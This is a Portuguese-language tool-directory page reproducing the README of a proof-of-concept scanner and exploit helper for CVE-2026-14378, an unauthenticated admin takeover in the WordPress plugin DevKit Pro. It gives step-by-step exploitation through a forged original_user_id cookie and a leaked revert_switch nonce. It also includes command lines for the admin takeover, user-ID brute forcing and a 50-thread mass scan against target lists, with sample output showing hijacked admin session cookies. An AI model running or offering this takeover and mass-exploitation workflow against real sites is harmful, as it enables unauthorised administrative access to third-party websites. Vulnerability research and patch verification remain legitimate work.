Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-14378 — Scanner PoC em Python e auxiliar de exploit para CVE-2026-14378, uma tomada de sessão de administrador não autenticada no plugin WordPress DevKit Pro através de um cookie original_user_id forjado. | Kitploit
Ferramentas/GitHubGitHub/murrez/cve-2026-14378
Ferramentas DefensivasReconhecimentoScanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de PenetraçãoAutenticação
GitHub
há 1 diaAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
murrez/cve-2026-14378

CVE-2026-14378

Scanner PoC em Python e auxiliar de exploit para CVE-2026-14378, uma tomada de sessão de administrador não autenticada no plugin WordPress DevKit Pro através de um cookie original_user_id forjado.

Ver Repositório
Compartilhar

CVE-2026-14378 — PoC de bypass de autenticação do DevKit Pro

Scanner de prova de conceito e auxiliar de exploração para CVE-2026-14378: tomada de sessão de administrador não autenticada no plugin WordPress DevKit Pro (dplugins) através de um fluxo de "reversão" de troca de usuário defeituoso.

Legal: Use apenas em sistemas que você possui ou tem permissão escrita explícita para testar. Acesso não autorizado é ilegal. Este repositório é para pesquisa defensiva, verificação e validação de patches.


Descrição do repositório GitHub (copiar-colar)

PoC for CVE-2026-14378: DevKit Pro ≤2.3.0 pre-auth admin takeover via forged original_user_id cookie + wp_footer revert_switch nonce. check/admin + mass scan.

Tópicos sugeridos: cve-2026-14378, wordpress, wordpress-exploit, devkit-pro, dplugins, authentication-bypass, poc, security-research


Vulnerabilidade em resumo

CVECVE-2026-14378
ProdutoDevKit Pro (fornecedor: dplugins)
TipoBypass de autenticação → sessão de administrador completa (CWE-287)
AfetadoTodas as versões ≤ 2.3.0
Corrigido3.0.0+ (changelog)
CVSS 3.19.8 Crítico — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence

Aviso relacionado (mesmo produto, bug diferente)

CVEProblemaAutenticação
CVE-2026-14357Instalação arbitrária de ZIP de tema via DPDEV_install_themesSubscriber+
CVE-2026-14378Tomada de sessão via reversão de troca de usuárioNenhuma

Este PoC tem como alvo apenas o 14378.


Causa raiz (técnica)

O Users Manager do DevKit Pro pode personificar usuários para testes. Quando um administrador troca para outra conta, o plugin armazena a identidade anterior em um cookie do cliente:

  • original_user_id — ID do usuário da conta antes da troca

Quando esse cookie está presente, o plugin renderiza um controle de "voltar" no wp_footer no front end, incluindo um nonce do WordPress vinculado à ação de reversão.

O manipulador revert_switch (AJAX) chama verify_nonce_and_capability(), que avalia incorretamente manage_options em relação ao usuário referenciado por original_user_id, em vez de usar current_user_can() no solicitante real (que pode estar completamente não autenticado).

Um atacante pode:

  1. Definir Cookie: original_user_id=<administrator_user_id> (comumente 1).
  2. Solicitar qualquer página pública e analisar o rodapé em busca do formulário de reversão / nonce.
  3. POST para wp-admin/admin-ajax.php com action=revert_switch (ou alias específico do plugin) e o nonce vazado.
  4. Acionar wp_set_auth_cookie() para o ID de usuário forjado → sessão de administrador autenticada.

Contexto oficial do recurso: Users Manager — switch back.


Fluxo de ataque

sequenceDiagram
    participant A as Attacker
    participant W as WordPress (front end)
    participant P as DevKit Pro
    participant X as admin-ajax.php

    A->>W: GET / (Cookie: original_user_id=1)
    W->>P: wp_footer hook
    P-->>W: switch-back HTML + nonce
    W-->>A: page body contains nonce
    A->>X: POST action=revert_switch + nonce
    Note over P,X: capability checked for user 1, not attacker
    X-->>A: Set-Cookie wordpress_logged_in_*
    A->>W: GET /wp-admin/
    W-->>A: admin dashboard

Quando a verificação é bem-sucedida vs falha

O comando check é intencionalmente rigoroso: ele reporta vulnerável apenas se um nonce de switch-back aparecer após forjar original_user_id.

ObservaçãoSignificado provável
VULNERABLE — switch-back material leakedO caminho de exploração provavelmente funciona; confirme em um laboratório antes de admin.
not vulnerable (check): no switch-back nonce…DevKit corrigido (≥ 3.0.0), plugin não instalado, Users Manager desabilitado (desligado por padrão), caminho de plugin personalizado, cache/CDN removendo o rodapé, ou site errado.
DevKit Pro readme not confirmedSem impressão digital pública de readme.txt; o plugin pode ainda estar presente mas oculto — o oráculo continua sendo o teste decisivo.
DevKit Pro <= 2.3.0 suspected + ainda sem nonceA versão vulnerável pode estar instalada mas o recurso de troca não está habilitado ou o rodapé não é renderizado nas URLs testadas.

Nota: Um HTTP 200 em /wp-content/plugins/.../readme.txt que retorna uma página HTML completa é um soft 404 comum do WordPress. Este PoC valida o conteúdo do readme (cabeçalho Plugin Name:), não apenas o código de status.


Requisitos

  • Python 3.9+
  • requests
pip install requests

Opcional: requirements.txt contém um mínimo fixado:

requests>=2.28.0

Instalação

git clone https://github.com/YOUR_USER/cve-2026-14378-poc.git
cd cve-2026-14378-poc
pip install -r requirements.txt   # or: pip install requests

Uso

Alvo único — apenas detecção (seguro)

Não completa a tomada de controle; apenas testa o oráculo de nonce do rodapé.

python poc.py check https://target.example/
python poc.py check https://target.example/ --user-id 2
python poc.py check https://target.example/ --timeout 40

Alvo único — tomada de sessão

Tenta o revert_switch completo e verifica o acesso a /wp-admin/.

python poc.py admin https://target.example/
python poc.py admin https://target.example/ --user-id 1 --brute 5
python poc.py admin https://target.example/ --log successes.txt
FlagDescrição
--user-idID de usuário administrador (ou alvo) forjado em original_user_id (padrão: 1)
--bruteTenta IDs 1..N quando o primeiro ID falha
--timeoutTimeout HTTP em segundos (padrão: 25)
--logAnexa URLs admin bem-sucedidas a um arquivo (padrão: logs.txt)

Varredura em massa (arquivo de lista)

Uma URL por linha; comentários # e colunas extras após espaço em branco são ignorados.

# Detection only (recommended first pass)
python poc.py targets.txt

# Exploit attempts (authorized targets only)
python poc.py targets.txt admin

Se nenhum arquivo for passado como primeiro argumento, o script solicita um caminho de lista (mesmo comportamento dos scanners de massa legados).

O modo massa usa um pool de threads (50 workers). Ajuste em poc.py se atingir limites de taxa.

Exemplo de arquivo de lista

# FOFA / manual imports
https://staging.example.com
example.org
192.0.2.10|wordpress|1.2.3   # only first token is used

Exemplo de saída

Vulnerável (check):

[*] https://vulnerable.example
[+] DevKit Pro <= 2.3.0 suspected (stable tag 2.3.0)
[+] VULNERABLE — switch-back material leaked (action=revert_switch, nonce=a1b2c3d4…)

Não vulnerável (varredura em massa típica):

[*] https://patched.example
[!] DevKit Pro readme not confirmed (hidden path, WAF, or plugin absent)
[-] not vulnerable (check): no switch-back nonce in wp_footer with forged original_user_id cookie — patched DevKit, Users Manager off, or wrong target

Admin bem-sucedido:

[*] https://lab.local
[+] https://lab.local -> administrator session as user_id=1
[+] cookie: wordpress_logged_in_…=…

Notas de implementação

Baixar ferramenta